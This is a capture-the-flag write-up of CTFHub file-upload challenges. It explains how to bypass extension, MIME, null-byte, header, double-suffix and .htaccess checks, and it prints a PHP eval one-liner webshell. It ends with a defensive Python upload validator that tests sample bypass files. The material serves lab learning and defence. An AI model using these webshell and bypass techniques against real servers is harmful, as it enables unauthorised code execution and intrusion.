CTFHub skill tree: Web, file upload section
A file upload vulnerability means an attacker uploads an executable file to the server and then executes it. The uploaded file can be a trojan, a virus, a malicious script, a WebShell and so on. This attack is among the most direct and effective; the technical bar for some file upload vulnerabilities is very low, so attackers can exploit them easily.
No validation
Because the uploaded file is not checked at all here, we upload a PHP file directly.
First, write a one-liner webshell (the "one sentence trojan").
The one-liner trojan uses $_GET[' '], $_POST[' '] or $_COOKIE[' '] to receive the data we send, passes the received data to a function that executes commands, and then runs the command.
Upload the file to the server through the browser.
From the address returned we can piece together the storage address of the shell.
Open AntSword and connect to the target address.
Go through the back-end directories one by one.
Then you can find the flag, and that's it.
Front-end verification
Before the file is uploaded, the front-end JS code validates the file suffix once, and only a file that meets the requirement can be uploaded. So here we simply change the file suffix.
Write the one-liner as passwd.php and change the suffix to png/jpg so the front end lets it through.
Open the web page in the browser and upload the file.
Bring up Burp and capture the packet. Find passwd.png and change it to 1.php.
You can see the upload succeeds, and here we can see the storage location of our "image" shell.
Copy the URL into AntSword and fill in the password.
In the URL field, fill in the storage address of our shell.
The password is simply the variable name used in the trojan.
Click Add with the data filled in, then look at file management.
You can see the shell is under /upload.
Then we find the flag in the /html directory.
MIME limit
When a file is uploaded, the upload of malicious files is restricted by checking the type of the selected file.
It's the same thing as before:
upload, capture the packet,
change Content-Type to image/jpeg,
connect with AntSword,
find the flag on the back end.
Here we look at the back-end source code.
In the if statement we can see that only the file type is restricted,
so we can also use the same method as the JS bypass:
first change the file to jpg, then change the suffix.
This way the file type also meets the requirement.
00 truncation
0x00 is the string terminator. An attacker can manually insert the terminator to cut off everything after it, and the part that follows can help bypass the detection.
Restrictions on 00 truncation
PHP < 5.3.29, and GPC (magic_quotes_gpc) off.
This one took me a long time, mainly because on my side the upload showed as successful
but I couldn't connect to it; I kept thinking it was the environment.
Later I found the reason.
On the site we can see /?road=, where road is the path the file is stored in.
If you don't truncate the path here and only truncate the file name,
the system will still store the file you uploaded under road.
Although the upload succeeds, the file name is modified by the server,
and the file suffix is changed to match your Content-Type.
So we don't only need to truncate the file name; road also has to be truncated, so that we can find the shell we uploaded.
As for the 00 truncation itself, either 0x00 or %00 works:
%00 is decoded by the server into 0x00.
One more thing to note: the name of your shell is given by
what you put in road,
and has nothing to do with your file name.
File header check
Header check: when the browser uploads a file to the server,
the server checks the Content-Type of the uploaded file;
if it is on the whitelist, the upload proceeds normally, otherwise the upload fails.
Let's change the header of the one-liner from before.
Open WinHex and change the file header. As for exactly what to change (I'm lazy and don't want to memorize it):
open a real image with the same suffix in WinHex and copy its first line,
then paste that first line in front of your one-liner.
As usual: upload, modify the captured packet, connect with AntSword, get the flag.
Double suffixes
Just go through it again: upload, capture and modify the packet.
Upload succeeded? Why? What happened to my suffix?
Since you ate one of my suffixes, I'll write two.
Heh, that works. Then AntSword, get the flag.
Actually, what this challenge does is filter out the strings on a blacklist:
php is filtered out. Since it filters, we go along with it
and make a payload that is still usable after filtering.
.htaccess
The .htaccess file is a configuration file of the Apache server. It is responsible for configuring the web pages in its directory; with .htaccess you can implement 301 redirects, custom 404 pages, changed file extensions, allowing/blocking access for specific users or directories, disabled directory listings, default document configuration and other functions.
First write a txt file, then rename it to .htaccess.
The content is as follows.
What it means is: files whose name contains 2 are parsed as PHP.
That's it. The 2.png we upload can be used as PHP.
Upload our .htaccess first, then upload 2.png.
Visit 2.png first.
You can see the code in front, which is the header copied earlier, while
<?php @eval($_POST['hack']) ?> is not displayed; this proves the PHP was parsed.
Connect with AntSword and get the flag.
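Every bypass in this writeup (front-end-only checks, the MIME limit, 00 truncation, double suffixes, the copied image header and the .htaccess upload) works because the server trusts something the client controls. As an added defender-side example, not code from the challenge or from the original writeup, here is the set of server-side checks that would have rejected each of the constructed sample uploads below; the .htaccess body is a placeholder and the one-liner is the one quoted above.

```python
import os
import re
import secrets

# Whitelisted extensions and the magic bytes a genuine file of that type starts with.
ALLOWED = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff"}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
PHP_TAGS = (b"<?php", b"<?=")

def validate_upload(filename: str, data: bytes, content_type: str = "") -> tuple:
    """(True, ext) if acceptable, else (False, reason). content_type is never trusted."""
    if "\x00" in filename or "%00" in filename.lower():  # raw or encoded terminator
        return False, "null byte in filename"
    if os.path.basename(filename.replace("\\", "/")) != filename:
        return False, "path component in filename"  # client picks no directory
    if filename.startswith("."):  # .htaccess and other dotfiles are never images
        return False, "hidden/config filename"
    parts = filename.lower().split(".")
    if len(parts) != 2:  # exactly one extension: 'a.php.png' fails here
        return False, "expected exactly one extension"
    stem, ext = parts
    if ext not in ALLOWED:  # whitelist on the final suffix: 'a.pphp' fails here
        return False, "extension not allowed: " + ext
    if not SAFE_STEM.match(stem):
        return False, "unsafe characters in filename"
    if not data.startswith(ALLOWED[ext]):  # real bytes, not the Content-Type header
        return False, "content does not match extension"
    if any(tag in data for tag in PHP_TAGS):  # image header with a script appended
        return False, "script tag inside image body"
    return True, ext

def storage_name(ext: str) -> str:
    # Server-chosen random name: the uploader neither picks nor learns the path.
    return f"{secrets.token_hex(16)}.{ext}"

# Constructed samples mirroring the writeup's bypass attempts (not from the challenge).
PNG_BODY = ALLOWED["png"] + b"\x00" * 16
SHELL = b"<?php @eval($_POST['hack']) ?>"
SAMPLES = [
    ("cat.png", PNG_BODY, "image/png"),            # legitimate image
    ("passwd.png", SHELL, "image/jpeg"),           # renamed shell with spoofed MIME
    ("shell.php.png", PNG_BODY, "image/png"),      # double suffix
    ("shell.php\x00.png", PNG_BODY, "image/png"),  # 00 truncation
    (".htaccess", b"# placeholder, not the real directive", "text/plain"),
    ("2.png", PNG_BODY + SHELL, "image/png"),      # copied header + appended shell
]

if __name__ == "__main__":
    for name, body, ctype in SAMPLES:
        print(repr(name), validate_upload(name, body, ctype))
```

The script-tag scan is a heuristic (a genuine image could in principle contain those bytes), so in production it complements, rather than replaces, re-encoding the image and serving uploads from a location where nothing is executed.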